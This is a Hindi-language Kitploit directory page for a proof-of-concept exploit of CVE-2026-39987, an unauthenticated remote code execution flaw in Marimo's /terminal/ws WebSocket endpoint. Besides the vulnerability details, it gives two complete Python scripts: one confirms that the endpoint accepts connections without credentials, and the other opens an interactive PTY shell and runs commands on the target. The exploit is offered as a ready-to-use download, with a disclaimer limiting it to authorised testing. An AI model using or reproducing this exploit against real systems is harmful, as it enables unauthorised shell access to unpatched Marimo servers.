Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-39987 — प्री-ऑथेंटिकेटेड रिमोट कोड एक्ज़ीक्यूशन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Marimo में WebSocket एंडपॉइंट के माध्यम से काम करता है, जिससे बिना प्रमाणीकरण के हमलावर इंटरैक्टिव PTY शेल प्राप्त कर सकते हैं। | Kitploit
उपकरण/GitHubGitHub/h3raklez/cve-2026-39987
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubh3raklez/cve-2026-39987

CVE-2026-39987

प्री-ऑथेंटिकेटेड रिमोट कोड एक्ज़ीक्यूशन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Marimo में WebSocket एंडपॉइंट के माध्यम से काम करता है, जिससे बिना प्रमाणीकरण के हमलावर इंटरैक्टिव PTY शेल प्राप्त कर सकते हैं।

रिपॉजिटरी देखें
14 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-39987 — Marimo प्री-ऑथ RCE

केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए।

विवरण

Marimo <= 0.20.4 में प्री-ऑथेंटिकेटेड रिमोट कोड एक्ज़ीक्यूशन।
WebSocket एंडपॉइंट /terminal/ws प्रमाणीकरण सत्यापन को छोड़ देता है, जिससे एक अनधिकृत हमलावर एक ही कनेक्शन के माध्यम से पूर्ण इंटरैक्टिव PTY शेल प्राप्त कर सकता है।

  • CVSS v4.0: 9.3 (क्रिटिकल)
  • CWE: CWE-306 (क्रिटिकल फ़ंक्शन के लिए प्रमाणीकरण की कमी)
  • प्रभावित संस्करण: <= 0.20.4
  • फिक्स्ड संस्करण: 0.23.0

आवश्यकताएँ

  • Python 3
  • websockets (pip install websockets)
  • लक्ष्य पर पोर्ट 2718 तक नेटवर्क एक्सेस

एंडपॉइंट सत्यापन

पुष्टि करता है कि एंडपॉइंट बिना क्रेडेंशियल्स के कनेक्शन स्वीकार करता है:

root@kitploit:~
import socket, base64, os

host = '127.0.0.1'
port = 2718
path = '/terminal/ws'

key = base64.b64encode(os.urandom(16)).decode()

handshake = (
    f'GET {path} HTTP/1.1\r\n'
    f'Host: {host}:{port}\r\n'
    f'Upgrade: websocket\r\n'
    f'Connection: Upgrade\r\n'
    f'Sec-WebSocket-Key: {key}\r\n'
    f'Sec-WebSocket-Version: 13\r\n'
    f'Sec-WebSocket-Protocol: terminal\r\n'
    f'\r\n'
)

s = socket.socket()
s.connect((host, port))
s.send(handshake.encode())
resp = s.recv(4096).decode(errors='ignore')
print(resp[:200])
s.close()

अपेक्षित परिणाम: HTTP/1.1 101 Switching Protocols


एक्सप्लॉइट

root@kitploit:~
import asyncio, websockets, re

async def exploit(host, port):
    uri = f"ws://{host}:{port}/terminal/ws"
    async with websockets.connect(uri, subprotocols=["terminal"]) as ws:
        print("[+] बिना प्रमाणीकरण के कनेक्शन स्थापित हुआ")
        await asyncio.sleep(0.3)

        # प्रारंभिक PTY बैनर पढ़ें
        try:
            msg = await asyncio.wait_for(ws.recv(), timeout=2)
            print("[PTY बैनर]:", repr(msg))
        except asyncio.TimeoutError:
            pass

        # कमांड भेजें
        await ws.send("id\n")
        await asyncio.sleep(0.5)

        # टाइमआउट तक फ्रेम पढ़ें
        output = []
        while True:
            try:
                msg = await asyncio.wait_for(ws.recv(), timeout=1.5)
                output.append(msg)
            except asyncio.TimeoutError:
                break

        clean = re.sub(r'\x1b\[[0-9;?]*[a-zA-Z]', '', "".join(output)).strip()
        print("[RCE आउटपुट]:", clean)

asyncio.run(exploit("127.0.0.1", 2718))

संदर्भ

  • https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc
  • https://nvd.nist.gov/vuln/detail/CVE-2026-39987
  • https://github.com/marimo-team/marimo/commit/c24d4806398f30be6b12acd6c60d1d7c68cfd12a
  • https://github.com/rxerium/rxerium-templates/blob/main/2026/CVE-2026-39987.yaml

अस्वीकरण

यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, अवैध है। लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।

टूल डाउनलोड करें